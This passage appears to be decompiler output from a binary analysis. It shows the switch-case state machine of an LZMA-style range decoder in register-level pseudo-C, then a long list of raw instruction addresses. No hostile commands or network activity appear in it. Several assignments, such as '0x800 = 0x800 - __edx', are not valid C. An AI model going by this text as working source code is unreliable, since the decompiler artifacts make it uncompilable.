											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                                      0x00000000
                                                      0x00407068
                                                      0x00407068
                                                      0x0040706c
                                                      0x00407095
                                                      0x0040709f
                                                      0x0040706e
                                                      0x00407077
                                                      0x00407084
                                                      0x00407087
                                                      0x004073cb
                                                      0x004073cb
                                                      0x004073ce
                                                      0x004073ce
                                                      0x004073ce
                                                      0x004073d4
                                                      0x004073da
                                                      0x004073e0
                                                      0x004073fa
                                                      0x004073fd
                                                      0x00407403
                                                      0x0040740e
                                                      0x00407410
                                                      0x004073e2
                                                      0x004073e2
                                                      0x004073f1
                                                      0x004073f5
                                                      0x004073f5
                                                      0x0040741a
                                                      0x00000000
                                                      0x00000000
                                                      0x0040741c
                                                      0x00407420
                                                      0x004075cf
                                                      0x004075e5
                                                      0x004075ed
                                                      0x004075f4
                                                      0x004075f6
                                                      0x004075fd
                                                      0x00407601
                                                      0x00407601
                                                      0x0040742c
                                                      0x00407433
                                                      0x0040743b
                                                      0x0040743e
                                                      0x00407441
                                                      0x00407441
                                                      0x00407447
                                                      0x00407447
                                                      0x00406be3
                                                      0x00406be3
                                                      0x00406be3
                                                      0x00406bec
                                                      0x00000000
                                                      0x00000000
                                                      0x00406bf2
                                                      0x00000000
                                                      0x00406bfd
                                                      0x00000000
                                                      0x00000000
                                                      0x00406c06
                                                      0x00406c09
                                                      0x00406c0c
                                                      0x00406c10
                                                      0x00000000
                                                      0x00000000
                                                      0x00406c16
                                                      0x00406c19
                                                      0x00406c1b
                                                      0x00406c1c
                                                      0x00406c1f
                                                      0x00406c21
                                                      0x00406c22
                                                      0x00406c24
                                                      0x00406c27
                                                      0x00406c2c
                                                      0x00406c31
                                                      0x00406c3a
                                                      0x00406c4d
                                                      0x00406c50
                                                      0x00406c5c
                                                      0x00406c84
                                                      0x00406c86
                                                      0x00406c94
                                                      0x00406c94
                                                      0x00406c98
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406c88
                                                      0x00406c88
                                                      0x00406c8b
                                                      0x00406c8c
                                                      0x00406c8c
                                                      0x00000000
                                                      0x00406c88
                                                      0x00406c62
                                                      0x00406c67
                                                      0x00406c67
                                                      0x00406c70
                                                      0x00406c78
                                                      0x00406c7b
                                                      0x00000000
                                                      0x00406c81
                                                      0x00406c81
                                                      0x00000000
                                                      0x00406c81
                                                      0x00000000
                                                      0x00406c9e
                                                      0x00406c9e
                                                      0x00406ca2
                                                      0x0040754e
                                                      0x00000000
                                                      0x0040754e
                                                      0x00406cab
                                                      0x00406cbb
                                                      0x00406cbe
                                                      0x00406cc1
                                                      0x00406cc1
                                                      0x00406cc1
                                                      0x00406cc4
                                                      0x00406cc8
                                                      0x00000000
                                                      0x00000000
                                                      0x00406cca
                                                      0x00406cd0
                                                      0x00406cfa
                                                      0x00406d00
                                                      0x00406d07
                                                      0x00000000
                                                      0x00406d07
                                                      0x00406cd6
                                                      0x00406cd9
                                                      0x00406cde
                                                      0x00406cde
                                                      0x00406ce9
                                                      0x00406cf1
                                                      0x00406cf4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406d39
                                                      0x00406d3f
                                                      0x00406d42
                                                      0x00406d4f
                                                      0x00406d57
                                                      0x004073cb
                                                      0x00000000
                                                      0x00000000
                                                      0x00406d0e
                                                      0x00406d0e
                                                      0x00406d12
                                                      0x0040755d
                                                      0x00000000
                                                      0x0040755d
                                                      0x00406d1e
                                                      0x00406d29
                                                      0x00406d29
                                                      0x00406d29
                                                      0x00406d2c
                                                      0x00406d2f
                                                      0x00406d32
                                                      0x00406d37
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004073ce
                                                      0x004073ce
                                                      0x004073d4
                                                      0x004073da
                                                      0x004073e0
                                                      0x004073fa
                                                      0x004073fd
                                                      0x00407403
                                                      0x0040740e
                                                      0x00407410
                                                      0x004073e2
                                                      0x004073e2
                                                      0x004073f1
                                                      0x004073f5
                                                      0x004073f5
                                                      0x0040741a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406d5f
                                                      0x00406d61
                                                      0x00406d64
                                                      0x00406dd5
                                                      0x00406dd8
                                                      0x00406ddb
                                                      0x00406de2
                                                      0x00406dec
                                                      0x004073cb
                                                      0x004073cb
                                                      0x00000000
                                                      0x004073cb
                                                      0x004073cb
                                                      0x00406d66
                                                      0x00406d6a
                                                      0x00406d6d
                                                      0x00406d6f
                                                      0x00406d72
                                                      0x00406d75
                                                      0x00406d77
                                                      0x00406d7a
                                                      0x00406d7c
                                                      0x00406d81
                                                      0x00406d84
                                                      0x00406d87
                                                      0x00406d8b
                                                      0x00406d92
                                                      0x00406d95
                                                      0x00406d9c
                                                      0x00406da0
                                                      0x00406da8
                                                      0x00406da8
                                                      0x00406da8
                                                      0x00406da2
                                                      0x00406da2
                                                      0x00406da2
                                                      0x00406d97
                                                      0x00406d97
                                                      0x00406d97
                                                      0x00406dac
                                                      0x00406daf
                                                      0x00406dcd
                                                      0x00406dcf
                                                      0x00000000
                                                      0x00406db1
                                                      0x00406db1
                                                      0x00406db4
                                                      0x00406db7
                                                      0x00406dba
                                                      0x00406dbc
                                                      0x00406dbc
                                                      0x00406dbc
                                                      0x00406dbf
                                                      0x00406dc2
                                                      0x00406dc4
                                                      0x00406dc5
                                                      0x00406dc8
                                                      0x00000000
                                                      0x00406dc8
                                                      0x00000000
                                                      0x00406ffe
                                                      0x00407002
                                                      0x00407020
                                                      0x00407023
                                                      0x0040702a
                                                      0x0040702d
                                                      0x00407030
                                                      0x00407033
                                                      0x00407036
                                                      0x00407039
                                                      0x0040703b
                                                      0x00407042
                                                      0x00407043
                                                      0x00407045
                                                      0x00407048
                                                      0x0040704b
                                                      0x0040704e
                                                      0x0040704e
                                                      0x00407053
                                                      0x00000000
                                                      0x00407053
                                                      0x00407004
                                                      0x00407007
                                                      0x0040700a
                                                      0x00407014
                                                      0x004073cb
                                                      0x004073cb
                                                      0x00000000
                                                      0x004073cb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004070ab
                                                      0x004070af
                                                      0x00000000
                                                      0x00000000
                                                      0x004070b5
                                                      0x004070b9
                                                      0x00000000
                                                      0x00000000
                                                      0x004070bf
                                                      0x004070c1
                                                      0x004070c5
                                                      0x004070c5
                                                      0x004070c8
                                                      0x004070cc
                                                      0x00000000
                                                      0x00000000
                                                      0x0040711c
                                                      0x00407120
                                                      0x00407127
                                                      0x0040712a
                                                      0x0040712d
                                                      0x00407137
                                                      0x004073cb
                                                      0x004073cb
                                                      0x00000000
                                                      0x004073cb
                                                      0x004073cb
                                                      0x00407122
                                                      0x00000000
                                                      0x00000000
                                                      0x00407143
                                                      0x00407147
                                                      0x0040714e
                                                      0x00407151
                                                      0x00407154
                                                      0x00407149
                                                      0x00407149
                                                      0x00407149
                                                      0x00407157
                                                      0x0040715a
                                                      0x0040715d
                                                      0x0040715d
                                                      0x00407160
                                                      0x00407163
                                                      0x00407166
                                                      0x00407166
                                                      0x00407169
                                                      0x00407170
                                                      0x00407175
                                                      0x00000000
                                                      0x00000000
                                                      0x00407203
                                                      0x00407203
                                                      0x00407207
                                                      0x004075a5
                                                      0x00000000
                                                      0x004075a5
                                                      0x0040720d
                                                      0x00407210
                                                      0x00407213
                                                      0x00407217
                                                      0x0040721a
                                                      0x00407220
                                                      0x00407222
                                                      0x00407222
                                                      0x00407222
                                                      0x00407225
                                                      0x00407228
                                                      0x00000000
                                                      0x00000000
                                                      0x00406df8
                                                      0x00406df8
                                                      0x00406dfc
                                                      0x00407569
                                                      0x00000000
                                                      0x00407569
                                                      0x00406e02
                                                      0x00406e05
                                                      0x00406e08
                                                      0x00406e0c
                                                      0x00406e0f
                                                      0x00406e15
                                                      0x00406e17
                                                      0x00406e17
                                                      0x00406e17
                                                      0x00406e1a
                                                      0x00406e1d
                                                      0x00406e1d
                                                      0x00406e20
                                                      0x00406e23
                                                      0x00000000
                                                      0x00000000
                                                      0x00406e29
                                                      0x00406e2f
                                                      0x00000000
                                                      0x00000000
                                                      0x00406e35
                                                      0x00406e35
                                                      0x00406e39
                                                      0x00406e3c
                                                      0x00406e3f
                                                      0x00406e42
                                                      0x00406e45
                                                      0x00406e46
                                                      0x00406e49
                                                      0x00406e4b
                                                      0x00406e51
                                                      0x00406e54
                                                      0x00406e57
                                                      0x00406e5a
                                                      0x00406e5d
                                                      0x00406e60
                                                      0x00406e63
                                                      0x00406e7f
